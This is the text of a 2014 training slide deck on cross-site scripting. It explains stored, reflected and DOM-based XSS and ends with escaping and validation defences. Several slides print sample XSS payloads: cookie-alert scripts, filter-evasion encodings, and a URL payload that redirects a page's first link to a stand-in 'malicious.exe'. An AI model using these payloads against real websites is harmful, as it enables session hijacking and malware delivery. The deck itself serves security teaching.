Post on 08-Jun-2015
description
TechTalk
FEBRUARY 2014
Cross Site Scripting XSS
DEPARTMENT: ARCHITECTURE AND DEVELOPMENT
2
^
» Introduction» Stored XSS» Reflected XSS» DOM Based XSS» XSS Attack Consequences» How to Protect Yourself
Table of Contents
3
^Introduction
https://www.owasp.org/index.php/Top_10_2013-Release_Notes
4
^
XSS flaws occur whenever» application takes untrusted data and sends it to a web
browser without proper validation and escaping
It allows » attackers to execute scripts in the victim’s browser which can:
» hijack user sessions, » deface web sites, or » redirect the user to malicious sites.
Introduction
5
^Introduction
https://www.youtube.com/watch?v=_Z9RQSnf8-g
6
^
» The injected code is permanently stored on the target servers:» Database» Message forum» Visitor log» Comment field. …
» The victim then retrieves the malicious script from the server when it requests the stored information
Stored XSS Attacks
7
^Stored XSS Attacks
Test XSS, <script>alert(document.cookie)</script>
8
^Stored XSS Attacks
Test XSS, <script>alert(document.cookie)</script>
9
^
» The injected code is reflected off the web server, such as in:» An error message» Search result» An e-mail message» Or any other response that includes some or all of the input sent to
the server as part of the request
Reflected XSS Attacks
10
^Reflected XSS Attacks
http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>
11
^Reflected XSS Attacks
Different syntax or enconding
Try to write this script in vulnerables input fields
" onfocus="alert(document.cookie)
"><script >alert(document.cookie)</script >
"%3cscript%3ealert(document.cookie)%3c/script%3e
"><ScRiPt>alert(document.cookie)</ScRiPt>
12
^
» The DOM, or Document Object Model, » is the structural format used to represent documents in a browser.» is the de-facto name for XSS bugs
DOM Based XSS
<script>document.write("Site is at: " + document.location.href + ".");</script>
13
^
» The consequence is the same regardless of whether it is stored, reflected or Dom based.» The most severe XSS attacks involve disclosure of the user’s session
cookie, allowing an attacker to hijack the user’s session and take over the account.
» It can also include the disclosure of end user files» installation of Trojan horse programs» redirect the user to some other page or site» modify presentation of content.
XSS Attack Consequences
14
^
» Escape Output Provided by UsersHTML encode any <, >, &, ‘, “ or don’t allow it
» Validate user data to make sure it meets your expectationsUse an HTML Policy engine to validate or clean user-driven HTML in an outbound way
How to Protect Yourself
Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes
String safe = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) );
JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values
String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );
Thank you for your attention!
16
^
» OWASP YouTube Chanelhttps://www.youtube.com/watch?v=_Z9RQSnf8-g
» OWASPhttps://www.owasp.org/index.php/XSShttps://www.owasp.org/index.php/Testing_for_Cross_site_scripting
» OWASP Protect MEhttps://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
» Obscurity by Security, and Other Techitudes by Adam Jon R.http://adamjonrichardson.com/2012/02/01/improving-xss-cross-site-scripting-prevention-in-four-simple-steps/
Additional Information